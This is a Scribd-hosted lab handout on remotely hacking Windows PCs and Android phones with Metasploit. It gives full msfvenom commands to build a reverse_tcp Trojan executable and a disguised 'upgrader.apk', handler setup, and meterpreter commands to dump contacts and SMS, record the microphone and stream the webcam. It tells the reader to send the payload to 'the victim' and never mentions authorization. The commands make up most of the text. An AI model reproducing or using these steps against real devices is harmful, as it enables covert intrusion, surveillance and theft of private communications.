50% found this document useful (2 votes)
492 views

Remote Hacking Lab 07 PDF

This document provides instructions for remotely hacking Windows systems and Android phones using Metasploit. It describes how to generate a reverse_tcp Trojan payload to execute on a Windows system for remote access via Metasploit. It also explains how to generate an Android payload apk file to install on a phone for remote access and control, including commands to gather information and control the device.

Uploaded by

Zain Shabbir
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
50% found this document useful (2 votes)
492 views

Remote Hacking Lab 07 PDF

This document provides instructions for remotely hacking Windows systems and Android phones using Metasploit. It describes how to generate a reverse_tcp Trojan payload to execute on a Windows system for remote access via Metasploit. It also explains how to generate an Android payload apk file to install on a phone for remote access and control, including commands to gather information and control the device.

Uploaded by

Zain Shabbir
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

LAB 07 - REMOTE HACKING VIA METASPOLIT

Learning Objectives

In today’s lab, you will learn/practice;

1. Remote hacking.
2. How to remotely hack windows system via msf console.
3. How to remotely hack android phone via msf console.

Practice Exercise

Windows Hacking:

1. Windows are vulnerable to Trojan attacks regardless of version. Open terminal in


kali linux and type

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f


exe LHOST=”attacker ip” LPORT=444 -o /root/Desktop/trojan.exe

A trojan will be generated in the desktop. A Trojan or backdoor can give access to
target machine remotely. We are using reverse_tcp Trojan. Reverse_tcp Trojan is
a specially crafted malware that establishes a remote connection to the hacker
machine over the TCP from the victim machine. This allows the hacker to breach
into the machine and take full control over it. Transfer the above created file to
victim’s PC and move on to handler section.
2. Start the metasploit framework console as follows:
root@kali:-# msfconsole
3. Now it's time to open and setup multi-handler. Follows the steps:
msf>use multi/handler
msf exploit(handler)>set payload windows/meterpreter/reverse_tcp
msf exploit(handler)>set LHOST “attacker ip”
msf exploit(handler)>set LPORT 444
msf exploit(handler)>exploit
Payload Handler is being started........
4. When the victim clicks on the .exe file in his system, meterpreter session will be
established.
5. Type meterpreter>help to find a list of commands and use them to exploit the
compromised PC
Android Hacking:

1. Open terminal in kali linux and type


#msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.0.110
LPORT=4444 R > /root/Desktop/upgrader.apk
(To know your LHOST, open a new terminal and type ifconfig).
2. Transfer/mail this file (here upgrader.apk) file to the victim's phone and install it.
3. Start the metasploit framework console as follows :
root@kali:-# msfconsole
4. Now it's time to open and setup multi-handler. Follows the steps:
msf>use multi/handler
msf exploit(handler)>set payload android/meterpreter/reverse_tcp
msf exploit(handler)>set LHOST “attacker ip”
msf exploit(handler)>set LPORT 4444
msf exploit(handler)>exploit

Payload Handler is being started........


5. When the victim clicks on the app (installed as MAIN ACTIVITY in the menu) in his
phone, meterpreter session will be established.
6. To start exploiting the compromised phone, type
sysinfo to get information of the device
ps to displays ongoing processes
dump_contacts fetches all contacts
dump_sms fetches all received/sent messages
record_mic 5 records for x seconds
webcam_list displays the camera’s available
webcam_snap displays the snapshot of the current activity
webcam_stream starts live video streaming from compromised device.

You might also like